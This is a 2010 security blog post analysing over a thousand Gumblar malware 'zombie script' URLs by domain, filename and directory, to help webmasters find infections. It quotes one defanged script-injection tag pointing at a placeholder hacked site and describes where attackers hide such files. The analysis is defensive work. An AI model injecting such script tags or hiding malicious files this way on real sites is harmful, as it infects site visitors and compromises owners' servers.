msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Analysis of Gumblar Zombie URLs

   29 Jun 10   Filed in General, Website exploits

As you might know, I maintain and regularly update a list of Gumblar zombie URLs. The main reason why I do it is to help webmasters of compromised sites find relevant information about the source of their problems and the steps required to clean up and secure their sites. I see this pattern quite often, when webmasters find a suspicious script in their web pages and use it in Google searches to find more information about it. On the other hand, this list can also help reveal the security breach of sites that hackers use to host Gumblar zombie scripts.

This week the list has reached the level of 1,000+ URLs. Although it’s just a small part of all Gumblar zombie scripts, this list makes a good base for a quick analysis of Gumblar zombie URLs.

What is a Gumblar zombie script?

On some compromised websites, Gumblar creates a new file with a .php extension. A link to this file is injected to other compromised sites.

<script src=hxxp://hacked-site.com/subdirectory/zombie-script.php ></script>

This script either tries to attack web surfers’ computer silently loading binary exploit files from the same zombie site, or load yet another zombie script from a third-party zombie site.

The zombie scripts are not linked to from any existing files on the same zombie site. Their are hidden somewhere in the directory structure and have names that look very trustworthy to site owners (they usually have a name of some existing legitimate file but with a .php extension). This is why webmasters of compromised sites (Gumblars zombies) are usually completely unaware of such scripts on their sites (and as a result they are usually puzzled over why Google has blacklisted their sites and says their sites host malicious content and infect other sites). Although my list is not complete, it helps webmasters locate zombie scripts on their sites.

And the below analysis of this list reveals interesting details both about the Gumblar attack and about its zombie URLs.

Analysis

I analyzed 1042 Gumblar zombie URL.

Top level domains

The attack affects sites all over the world. My list contains sites with 73 different top level domains. Of course, .com sites (as the most wide-spread) are the most affected.

------------------- Top 10 TLDs ---------------------
1 .com 452 43.4%
2 .net 77 7.4%
3 .ru 57 5.5%
4 .org 48 4.6%
5 .hu 37 3.6%
6 .de 32 3.1%
7 .in 25 2.4%
8 .pl 23 2.2%
9 .kr 23 2.2%
10 .ar 17 1.6%
: the rest 251 24.1%

Top 10 TLDs

File names

1042 URLs contain 749 unique filenames. As I already told you, the names are usually a combination of a name of some existing file and a .php extension. So no wonder, the most popular name of a zombie script is index.php. However, sometimes hackers use a filename (specific to the Gumblar attack) that doesn’t match any filenames of existing files – gifimg.php. It the the second most popular name of Gumblar zombie scripts.

---------------- Top 10 Filenames -------------------
1 index.php 73 7.0%
2 gifimg.php 55 5.3%
3 contact.php 13 1.2%
4 style.php 9 0.9%
5 error_log.php 8 0.8%
6 _vti_inf.php 8 0.8%
7 LICENSE.php 8 0.8%
8 favicon.php 7 0.7%
9 .ftpquota.php 7 0.7%
10 robots.php 7 0.7%
: the rest 847 81.3%

Top 10 Filenames

Directories

To make zombie scripts less prominent, hackers create them in subdirectories of hacked sites. In my list of 1042 URLs I found 562 unique paths (excluding filenames) to the rogue scripts. The most popular location of Gumblar zombie scripts is the /images directory (16.5%). It’s a very good location to hide malicious files — webmasters rarely check directories with image files when they are searching for something that can contain executable code. Moreover, if a file has some benign filename (e.g. gifimg) it can be easily overlooked. Other service directories (e.g. /cgi-bin, /_vti_bin, /css, /tmp, /js) are also among popular locations.

The tenth position is empty. This means that in less than 1% of cases the zombie script was found directly in the site root directory.

----------------- Top 10 directories ----------------
1 /images 172 16.5%
2 /cgi-bin 24 2.3%
3 /_vti_bin 21 2.0%
4 /css 18 1.7%
5 /img 15 1.4%
6 /tmp 13 1.2%
7 /wp-content 12 1.2%
8 /js 10 1.0%
9 /wp-admin 10 1.0%
10 9 0.9%
: the rest 738 70.8%

Top 10 directories

Subdirectory levels

In majority of cases (91.5%), zombie scripts can be found in a subdirectory one level deep. E.g. /images/zombie.php, /tmp/zombie.php, etc. However, sometimes their location is as deep as 3 levels from site root. E.g. /_flash/_notes/vz29/zombie.php. In nine cases (<1%), zombie scripts were found in a root directory (0 levels deep)
---------- Location relative to site root -----------
1 1 level deep 953 91.5%
2 2 levels deep 56 5.4%
3 3 levels deep 24 2.3%
4 0 levels deep 9 0.9%

Location relative to site root

Web servers

Gumblar uses stolen FTP credentials to break into web sites. This means that regardless of web server technology any site is potentially vulnerable to this sort of attack (as long as webmasters use FTP). My list of Gumblar zombie URLs provide enough evidence to prove this. You can find filenames and directories specific to different web server technologies.

For example:

  • .htaccess.php files — Apache
  • _vti_bin directories and _vti_inf.php files — sites powered by Microsoft technologies
  • WEB-INF/classes/v7j/servertest.class.phpTomcat

“s” directories

On many websites, next to a Gumblar zombie script there is a directory called s. It contains Gumblar service and log files. If you find it on your server, make sure to delete it.

Have your say

Did you notice any other interesting patterns in the list of Gumblar zombie URLs? Your comments are welcome!

Related posts:

Reader's Comments (3)

  1. |

    [...] This post was mentioned on Twitter by Rodrigo (Sp0oKeR) and Denis, Gumblar. Gumblar said: Blog: Analysis of Gumblar Zombie URLs | Unmask Parasites. Blog. http://bit.ly/9Iz9qq [...]

  2. |

    I think one way they are getting into websites is acting as programmers for hire via websites like freelancer.com. They say they cannot do the work without your FTP details. And there you go, you just paid someone to hack your site and put you out of business. I hired a freelance programmer from the UK and right away my site had a grumblar.

    • |

      Sounds like very ineffective way to infect websites ;-)

      The most probable scenario is that programmer’s computer was infected and you FTP credentials were stolen from his computer.

      Anyway, if you have to give FTP access to third-parties, try to provide them with the most restrictive permissions possible. And once the job is done, change the passwords right away.